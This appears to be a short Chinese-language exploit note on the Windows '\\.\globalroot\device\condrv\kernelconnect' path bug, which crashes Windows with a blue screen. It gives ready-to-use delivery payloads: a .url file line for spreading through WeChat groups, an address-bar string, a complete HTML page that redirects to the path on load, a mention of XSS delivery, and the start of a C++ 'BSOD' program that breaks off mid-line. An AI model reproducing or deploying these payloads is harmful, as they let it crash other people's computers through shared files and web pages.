可使用途径:微信制作.url文件或其他文件,地址栏直接访问,做成html,exe等文件,xss利用等
url文件制作:https://baijiahao.baidu.com/s?id=1553137529313837&wfr=spider&for=pc
url文件内核心代码为:file:///globalroot/device/condrv/kernelconnect
通过微信等软件直接发群里.url的文件可直接触发访问(微信已修复)
直接浏览器地址栏(除ie浏览器)访问:\\.\globalroot\device\condrv\kernelconnect
html代码文件
<html><head></head><body>><script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script></body></html>
exe代码文件
// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。// #include <iostream>#include <Windows.h> int main(){ WCHAR fileName[] = L"\\\\.\\globalroot\\device\\condrv\\ker